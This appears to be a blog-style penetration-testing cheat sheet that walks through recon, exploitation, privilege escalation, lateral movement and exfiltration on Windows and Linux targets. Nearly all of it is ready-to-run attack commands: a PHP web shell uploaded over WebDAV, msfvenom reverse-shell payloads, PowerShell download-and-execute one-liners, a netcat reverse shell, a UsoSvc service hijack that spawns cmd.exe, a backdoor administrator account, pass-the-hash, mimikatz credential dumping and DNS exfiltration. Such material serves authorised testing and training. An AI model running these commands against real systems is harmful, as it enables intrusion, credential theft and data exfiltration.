This is the pentest cheatsheet for ethical hackers. It is a living document which grows and refines over time like an aged whiskey.
Want to try out pentesting yourself? This is the workhorse virtual lab setup and configuration I use for testing.
Make your own hacking lab, see my guide Set Up A Domain Controller to Hack At Home.
Table of Contents
Setting up for reporting
My reporting tool of choice is CherryTree, mostly because KeepNote is no longer installed by default and it is known to crash. When you have done a ton of work and your work is erased by a crash that is no fun at all. The only problem is now how to get screenshots into CherryTree. The steps are simple. First thing I do is install gnome-screenshot which does not come installed by default. Do this doing an apt install gnome-screenshot. Next find Keyboard app and create a new shortcut. Give it something unique as I did. Now open CherryTree and paste the new screenshot in an open node/sub-node.
Add New Executables to PATH
You get new tools by using a git clone github.com/repo and I usually then add the directory to my PATH by editing /root/.bashrc as the following:
# add to PATH
export PATH=$PATH:/usr/bin/dirsearch
# restart .bashrc shell settings
$ source /root/.bashrc
Phase I: Information Gathering
A favorite Nmap scan that scans all ports 1-65535 (-p-) and service version (-sV) and outputs in all formats (-oA).
nmap -sV -p- -oA nmap/this-new-scan 192.168.56.101
Nmap NSE Scripts
Locate the nmap NSE scripts to use them.
locate *.nse
Nmap Script Scan for SMB
nmap -p- -A --script=smb-vuln*
# works more oftne
nmap -p 445 --script=vuln
Nmap Script Scan for WebDAV
Run scan for WebDAV enabled devices.
nmap --script http-webdav-scan
For speedy and inclusive nmap scans try this.
$ nmap -p 1-65535 -T4 -A -v 10.0.0.1
Or the always useful combination of flags such as this one.
$ nmap -sC -sV -oA nmaps/new-nmap 10.0.0.1
Goscan
Try using GoScan.
https://github.com/marco-lancini/goscan
Bash Pingsweep
Using bash to do a ping sweep of the local subnet.
for i in `seq 1 255`; do ping -c 1 10.x.x.x.$i ; done
Telnet
Using telnet for banner grabbing.
telnet $ip
Auxiliary Metasploit Modules
Show auxiliary modules installed.
show auxiliary
use auxiliary/scanner/smb/smb_version
AutoRecon
Get AutoRecon by Tib3rius. I have spoken with the author and many others say it is the best as well.
git clone https://github.com/Tib3rius/AutoRecon
pip3 install -r ~/Autorecon/requirements.txt
echo export PATH=$PATH:~/Autorecon/src/autorecon/autorecon.py >> ~/.bashrc
exec bash
source ~/.bashrc
./autorecon.py <target>
Onetwopunch
Get onetwopunch from the Github repo.
git clone https://github.com/superkojiman/onetwopunch
cp -r onetwopunch/onetwopunch.sh /usr/bin
root@kali:~# onetwopunch.sh -t ips.txt tcp
Reconnoitre
Get Reconnoitre for automated intel gathering.
git clone https://github.com/codingo/Reconnoitre.git
python setup.py install
reconnoitre -t 192.x.x.x -o /root/targets-intel --services
reconnoitre -t 192.x.x.x -o /root/targets-intel --services --pingsweep
reconnoitre -t 192.x.x.x -o /root/targets-intel --pingsweep --hostnames
Netcat for Port Scanning
$ echo 10.0.0.1 > hostlist.txt
$ while read line; do nc -v -z $line 1-65535; done < hostlist.txt
$ echo 1-65535 > portlist.txt
$ while read port; do nc -v -z 192.168.0.15 $port; done < portlist.txt
DNS Enumeration
Get basic DNS information.
# use nbtscan
nbtscan $ip
# use nmblookup
nmblookup $ip
# nmap
nmap -sU -p 53 $ip-range -vv -oA dns-scan
DNS Zone Transfer
# find DNS servers
host -t ns domain | cut -d " " -f 4
# zone transfer request
host -l domain dns-server-name
Using DNSRecon and DNSEnum
# dnsrecon
dnsrecon -d domain -t axfr
# dnsenum
dnsenum domain
Web Target Enumeration
Use gobuster.
Here is an example to use for general web/Apache web technologies being present.
gobuster -w /root/SecLists-master/Discovery/Web-Content/common.txt -u http://target
And another for using against Microsoft SQL Server instances.
gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-1.0.txt -u http://target
Updated 11-2019
gobuster dir -u http://10.0.0.2 -w ~/seclists/Discovery/Web-Content/common.txt -v
Install gobuster.
$ cd Downloads/
$/Downloads: sudo tar -C /usr/local -xzf go1.12.7.linux-amd64.tar.gz
# add to PATH
$ nano /root/.bashrc
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$(go env GOPATH)/bin
export GOPATH=$(go env GOPATH)
$ source /root/.bashrc
# get the package
$ go get github.com/OJ/gobuster
# install
$ cd go/src/github.com/OJ/gobuster
$ go install
Or get the Debian package.
$ sudo apt-get install gobuster -y
Use gobuster to find common web files.
# use seclists common discovery list
gobuster -w seclist/Discovery/Web-Content/common.txt -u http://10.1.1.1
Use dirsearch.
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION> -w words
python3 dirsearch.py -u http://10.0.0.2 -e html,aspx,php
Gobuster by design does not allow a recursive option.
git clone https://github.com/epi052/recursive-gobuster
./recursive-gobuster/recursive-gobuster.pyz http://10.0.0.158
Active Directory Enumeration
Install winldapsearch. You may need some dependencies first.
sudo apt-get install libsas12-dev python-dev libldap2-dev libssl-dev
sudo pip3 install python-ldap
Whatweb
Use whatweb to enumerate the webserver running the web application.
$ whatweb 10.0.0.1
MS SQL Exploitation
Using Metasploit.
msf > use windows/mssql/mssql_payload
Here is how to connect to an MS SQL Server from Kali Linux.
sqsh -S [SQL_SERVER]
NFS Exploitation
Network File System is a unix network file sharing service.
# using rpcinfo
$ rpcinfo -p 10.0.0.1
# using nmap
# showmount will list exported folders
$ showmount -e 10.0.0.1
# display mount points
$ showmount -a 10.0.0.1
# display exported directories
$ showmount -d 10.0.0.1
# mount the share
$ mount -t nfs 10.0.0.1:/ /mnt/tmp -o nolock
# verify new mount point
$ df -k
WordPress Exploitation
wpscan –url http://10.1.1.1/wp-login –passwords fsocity.dic -U elliot
Sometimes enumerating plugins requires aggressive detection mode.
wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p,u --plugins-detection aggressive
Try enumerating users.
wpscan --url $url --enumerate u
Exploiting a wordpress site can be done by injecting a PHP shell into a PHP file in the theme, such as archive.php. The script can then be called by going to wp-content/themes/themename/script.php and having a listener open at the same time.
Enumerating Users
Using the finger service.
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ finger-user-enum.pl -t $target -U /wordlist.txt
$ finger [email protected]
Get ident-user-enum for when you detect that TCP-113 ident protocol is open.
pentestmonkey.net/tools/user-enumeration/ident-user-enum
Vulnerability Scanners
Openvas
Install and use openvas.
sudo apt-get install openvas -y
openvas-setup
openvas-start
127.0.0.1:9392
Nessus
Read the huge article I made for Nessus!
SNMP Enumeration
https://github.com/dheiland-r7/snmp
You can use
Phase II: Exploitation
DNSAdmins Group Exploit
dnscmd.exe FQDN /config /serverplugindll \\kali-ip\share\myplugin.dll
sc.exe FQDN stop dns
sc.exe FQDN start dns
Freerdp
xfreerdp /u:cjosh4751 /p:iamgreat$1 /v:10.0.0.184
WebDAV Exploitation
Use cadaver.
cadaver http://10.0.0.1/webdav
Put a reverse shell on the webserver.
- echo “<?php system($_REQUEST[‘cmd’]); ?>” > /tmp/shell
echo "<?php system($_REQUEST['cmd']); ?>" > /tmp/shell
put /tmp/shell.php
http://10.x.x.x/webdav/shell.php?cmd=ipconfig
File Upload Bypass Techniques
There are times where uploading a file extension is forbidden.
$ cadaver 10.0.0.1
dav:/ move my-shell.txt my-shell.php
dav:/ move my-shell.txt my-shell.asp;.txt
FTP Exploitation
See what accounts are present.
nmap --script ftp*
Use hydra to crack user accounts.
hydra -L /root/seclist/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 10.1.1.1 ftp
SMTP Exploitation
Use smtp-user-enumeration to enumerate users on the system.
$ smtp-user-enumeration -t 10.0.0.1 -U wordlist
Use nmap scripts to enumerate users.
$ nmap --script smtp-enum-users.nse
Use Metasploit’s auxiliary smtp module.
use auxiliary/scanner/smtp/smtp_enum
SMB Exploitation
Use crackmapexec.
Basic discovery.
$ apt-get install crackmapexec
$ crackmapexec smb 10.0.0.0/24
Using credentials.
$ crackmapexec smb 10.0.0.0/24 -u admin -p password
Using Pass-the-Hash technique.
$ crackmapexec smb 10.0.0.0/24 -u admin -H ntlm hash
The point of SMB exploitation is one way finding the version of the SMB service running. For example Samba version 2.x.x
# use nbtscan
$ nbtscan $target
# use nmblookup
$ nmblookup -A 192.168.1.144
Looking up status of 192.168.1.144
VULNSHARE02 <00> - B <ACTIVE>
# use smbclient L=list shares N=anonymous login
smbclient -L -N $target ip
# list shares
$ smbclient -L NETBIOS NAME -OR- $target ip
# connect to a share using password or NOT
$ smblient -N \\\\192.168.1.144\\\c$ PASSWORD
Use smbmap.
smbmap -H $target -u admin -p password
For brute forcing the shares’ credentials use hydra.
hydra -L users-list.txt -P /usr/share/wordlists/metasploit/unix_passwords 192.x.x.x smb
Enumerate Samba shares across the network using smbmap.
smbmap -u john316 -p password123 -H 192.x.x.x
Use smbclient to access shares with READ/WRITE
smbclient \\10.1.1.1.\sharename
Enumerate users using nmap scripts.
nmap --script smb-enum-users.nse -p 445 10.1.1.1
Brute force smb logins: using nmap.
nmap --vv -p 139,445 --script=smb-brute 10.0.2.18
Using medusa.
medusa -h 10.0.2.18 -P /usr/share/wordlists/rockyou.txt -U /root/seclist/Usernames/top-usernames-shortlist.txt -M smbnt
Compiling Exploits
If you need to compile using gcc try these:
sudo apt-get install gcc-multilib
There are many flags that can be used: For example to compile for 32 bit targets try this:
-m32 (32 bit target)
-Wl,--hash-style=both (include both gnu and sysv hashtables - Wl, passes comma separated arguments to the linker)
Additionally to cross compile:
# install mingw cross-compiler
sudo apt-get install mingw-w64
# compile a 32-bit Windows exe
i686-w64-mingw32-gcc -o exploit.exe exploit.c
# compile a 64-bit Windows exe
x86_64-w64-mingw32-gc -o exploit.exe exploit.c
Searching In Searchsploit
Download the target.
searchsploit -m exploit-number
Print the target to screen. BE WARNED this will open in vim, so use esc + q to exit.
searchsploit -x exploit-number
Run Popular Exploits
For running exploits on targets vulnerable to EternalBlue
https://github.com/3ndG4me/AutoBlue-MS17-010
cd shellcode
sh prep.sh
Use Impacket
Setup is simple.
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python setup.py install
python wmiexec.py admin:[email protected]
Impacket – Move Files Post Exploit
smbserver.py -comment ‘SHARE 01 Says Hi’ SHARENAME /dir-to-share
Combining smbserver.py with Windows copy is a no brainer, it is native to Windows.
Impacket – Get Compiled Version
Get the executable version of Impacket from github. All the scripts found in Impacket have been compiled for Windows and are hosted on this repository.
Web App Exploitation
If there an application running that is susceptible to SQL injection then try these.
' or '1'='1
Netcat
Put simply nectat is a *nix tool that allows the user to read and write to TCP or UDP connections. On the Kali host type the following:
root@kali:~ nectat -nv 10.x.x.x 4400
On the Windows host or in a shell via Metasploit type the following:
netcat.exe -nlvp 10.x.x.x 4400
Sending Files with Netcat
On the sending side:
nc -v $destination ip $port < file
On the receiving side:
nc -lvp $port > file
Cracking weak passwords
SecLists
Get SecLists for custom wordlists for brute forcing services.
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip && unzip SecList.zip && rm -f SecList.zip
Use John’s builtin wordlist.
cp /usr/share/john/password.lst /root
Using ncrack.
ncrack -v 10.x.x.x:3389 -user admin -P /usr/share/wordlists/rockyou.txt
Using hashcat.
hashcat -m 1000 hashes-to-crack.txt /usr/share/wordlists/rockyou.txt
Using brutespray.
sudo apt install brutespray
# feed a recent nmap scan into spray and set service as ftp
brutespray --file top-20-ports-scan.xml --threads 20 -s ftp
Upgrading Your Shell
Try python-pty-shells.
https://github.com/infodox/python-pty-shells
Use Python if it is installed on the remote machine.
python -c 'import pty; pty.spawn("/bin/bash")
Client-Side Attack
To run an msfvenom payload for a reverse shell on the client.
root@kali:~ systemctl start postgresql
root@kali:~ msfdb init
root@kali:~ msfconsole
msf > workspace -a scenario_1
msf > workspace scenario_1
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x -f exe -o /var/www/reverse_shell.exe
msf > cd /var/www
msf > python -m SimpleHTTPServer 8000
msf > service apache2 start
Then there is netcat.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
meterpreter > shell
Process 3912 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Not a root level user, just a regular AD user.
C:\Users\Sam\Desktop>whoami
sam-pc\sam
C:\Users\Sam\Desktop> exit
Payload Generation
Msfvenom payloads. Staged and nonstaged. Staged exploits need a multi-handler listener while unstaged exploits do not.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=443 -f raw > shell-rev.php
UNSTAGED
msfvenom -p windows/shell_reverse_tcp -f c/python/raw LHOST LPORT
msfvenom -p windows/x64/shell_reverse_tcp -f c/python/raw LHOST LPORT
STAGED
msfvenom -p windows/shell/reverse_tcp -f c/python/raw LHOST LPORT
Special PHP shells.
https://github.com/flozz/p0wny-shell
Phase III. Privilege Escalation
Windows Privilege Escalation
The Windows equivalent of the Linux cat command is type.
type flag.txt
See the current user.
echo %USERNAME%
See all users.
net users
Get accessck.exe
wget https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Do a search for the Windows local user access control exploit, “bypassuac”.
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > show options
msf5 exploit(windows/local/bypassuac) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/bypassuac) > run
Certutil to Move Files
certutil.exe -urlcache -split -f http://10.0.0.1/test.txt test.txt
Using cscript
cscript wget.vbs http://10.0.0.2/shell.ps1 shell.ps1
Win Priv Esc – PowerSploit
Win Priv Esc – PowerTools
PowerShell
Moving Files to the Victim with PowerShell
In terms of working with tools native to Windows, PowerShell takes the cake. In other words, it’s a great way to move the attack sequence along without requiring a lot of tools on-boarding to the victim machine. Just for kicks we moved wget over to the Windows machine using nectat. PowerShell is installed by default on Windows hosts and has a pretty simple syntax for creating one-liners we need to exploit further.
meterpreter > shell
C:\Windows\System32>cmd.exe
C:\Windows\System32>powershell
C:\Windows\System32>powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10..x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')
PowerSploit
Invoke–Shellcode (used to be Invoke-Shellcode the author likes to remind people to watch what they download freely from the internet ) can be loaded into memory thus avoiding writing anything at all to disk.
C:\ Powershell -exec -c IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1")
With a PowerShell session already open on the target you can download further files.
PS c:\lowuser> IEX (New-Object Net.WebClient).downloadString('http://{kali ip addr}:8000/file.ps1')
PowerUp
Get PowerUp.ps1 onto the target or run the module in memory by using the following commands.
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/PowerUp.ps1') ; Invoke-AllChecks"
c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/powerup.ps1') ; Invoke-AllChecks"
Alternatively once you have a PS session open on the target this will work as well.
PS C:\Users\bob\> IEX(New-Object Net.WebClient).downloadString('http://10.0.0.250/PowerUp.ps1'); Invoke-AllChecks
To run powerup.ps1 when it is on the target run the following: c:>powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
iwi -uri http://kali:80/powerview/ps1 -outfile /tmp/powerview.ps1
Try using Sherlock or JAWS.
Sherlock
git clone https://github.com/rasta-mouse/Sherlock
Get Sherlock.ps1 onto the target or run the module in memory by using the following commands.
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/Sherlock.ps1') ; Find-AllVulns"
Or if you have a PS session already opened use it this way.
IEX(New-Object Net.WebClient).downloadString('http://10.0.0.250/Sherlock.ps1') ; Find-AllVulns
First host Sherlock.ps1 on your Kali machine and transfer it to the target. To use Sherlock call it from a PowerShell session on the target using a terminal shell. powershell -exec bypass -Command “& {Import-Module .\Sherlock.ps1; Find-AllVulns}”
powershell -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
Yet another way to run Sherlock.
c:\> powershell -ep bypass
c:\> Import-Module .\Sherlock.ps1
c:\> Find-AllVulns
Watson
Watson is the updated version of Sherlock.
# get dependencies to compile
apt-get install -y nuget mono-devel mono-xbuild
# build the sln file
xbuild Watson.sln
# where to find compiled exe
/Watson-2.0/Watson/bin/Debug/watson.exe
To get the compiled binary to the host use wget.
PS > wget http://10.0.0.250/watson.exe -o patch.exe
PS > ./patch.exe
JAWS
https://github.com/411Hall/JAWS
Windows Exploit Suggester
To use Windows Exploit Suggester first run a command on the Windows shell to get the sysinfo command output.
C:\lowuser> systeminfo
Copy the output of this command into a text file name it sysinfo.txt and proceed.
# clone the repo
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
# update the local db
python windows-exploit-suggester.py --update
Now to use it to identify vulnerabilities. The –update command downloads the Microsoft security bulletin database locally.
C:\lowuser> python windows-exploit-suggester.py --systeminfo sysinfo.txt --database 2019-11-22-mssb.xls
You may need to install a dependency, to do so:
pip install xlrd
Python missing? Try Windows-exploit-suggester as a standalone binary.
root@kali: pyinstall --onefile windows-exploit-suggester.py
cp windows-exploit-suggester.exe /usr/share/windows-binaries/wes.exe
Nishang
git clone https://github.com/samratashok/nishang
PSAttack
https://github.com/jaredhaight/PSAttack
Pre compiled versions of common Windows exploits can be downloaded.
https://github.com/SecWiki/windows-kernel-exploits
Powerline
Get Powerline to target.
certutil -urlcache -split -f http://10.0.0.250/PowerLine.exe PowerLine.exe
Use Powerline to get a reverse shell.
PowerLine.exe Invoke-PowerShellTcp "Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.250 -Port 4444"
Powerview
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Internal Monologue
C:\>powershell.exe -nop "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/eladshamir/Internal-Monologue/master/Invoke-InternalMonologue.ps1');"
CVE-2019-1322 Windows 10 UsoSvc Exploit
PS C:\spongebob> sc.exe stop UsoSvc
PS C:\spongebob> sc.exe config usosvc binPath="C:\Users\writeable\nc.exe 10.0.0.1 6666 -e cmd.exe"
PS C:\spongebob> sc.exe start UsoSvc
Linux privilege escalation
Get linpeas
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
Get a script to suggest exploits.
https//www.securitysift.com/download/linuxprivchecker.py
Get linux-smart-enumeration tool.
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
Get linenum tool.
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Get Roothelper.
https://github.com/NullArray/RootHelper
Find binaries with the SUID and GUID bits set. This will allow a normal user to run them with the privileges of the file’s original owner.
find / -user root -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Where SUID + GUID both set
find . -perm /6000
Use automated tools whenever possible. Make sure you try out linuxprivchecker.py
git clone https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
Make current user root. If you are able to write to /etc/passwd and you have the password for the current user you can elevate the user to root.
# change the uid and guid to 0 for root
bobby:x:0:0::/home/bobby:/bin/sh
List Out Files Properly
This is the best way to do it.
find /home -printf "%f\t%p\t%u\t%g\t%m\t%n\n" 2=/dev/null | column -t
Use linux priv checker
git clone https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
chmod 700 linuxprivchecker.py
python linuxprivchecker.py
Reverse Shell One Liners
#pentestmonkey one liner - if nc -e is an invalid option credit jeff price
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.100 4444 >/tmp/f
Cracking Passwords
How to crack found SSH RSA keys
Use ssh2john and then john to crack it.
git clone https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
ssh2john key > crackme.txt
john --wordlist=/usr/share/yourwords crackme.txt
Persistence
Using the net command add a new user. Next using the same command add the newly created user to the local administrators group.
meterpreter > sessions 2
meterpreter > shell
C:\Windows\System32>C:\Windows\System32>net user /add evil password
net user /add evil password
The command completed successfully.
C:\Windows\System32>net localgroup administrators evil /add
net localgroup administrators evil /add
The command completed successfully.
Phase IV: Moving Laterally
Pass-the-Hash
pth-winexe -U domain.locall/Administrator%HASH(NT/NTLM) //hostname.local cmd.exe
Meterpreter Shell
load kiwi
creds_all
load mimikatz
mimikatz_command -f samdump::hashes
Psexec
psexec \\$ip cmd.exe
Have Creds?
Use psexec from Impacket and open a new shell as another user.
python psexec.py testlab.local/Administrator:[email protected] cmd
CredNinja
Your output may look different, because I added a line in the Python script to print the command.
root@kali:~ python3 CredNinja.py -a accounts.txt -s servers.txt --valid
['smbclient', '-U', 'ethicalhackingguru\\\\Administrator', '\\\\10.x.x.x\\c$', 'Password123!', '-c', 'dir', '-m', 'SMB3']
10.x.x.x ethicalhackingguru\\Administrator Password123! LOCAL ADMIN! Valid
Runas
Using runas. Means running locally but authenticating as another user over the network.
C:\Users\skippy\runas /netonly /user:ethicalhackingguru\administrator cmd.exe
and a new terminal is now open running as administrator, reading cmd.exe (running as ethicalhackingguru\administrator).
SSH
Connecting to the target with the found passphrase and an RSA private key can be useful.
ssh -i rsa.key [email protected]
Phase V: Exfilitration
DNSteal
root@kali: git clone https://github.com/m57/dnsteal
python dnsteal.py 127.0.0.1 -z -s 4 -b 57 -f 17
DNSteal enables a DNS server listening for incoming DNS requests. By binding networking socket to port 53 the tool takes these requests and facilitates moving data. The commands are displayed that are used to leverage the server, notice how they are regular DNS *nix commands. In other words, dig is used to exfiltrate files and folders.
Check Existing Guides
https://malikashish8.github.io/Walkthrough/notes/
https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70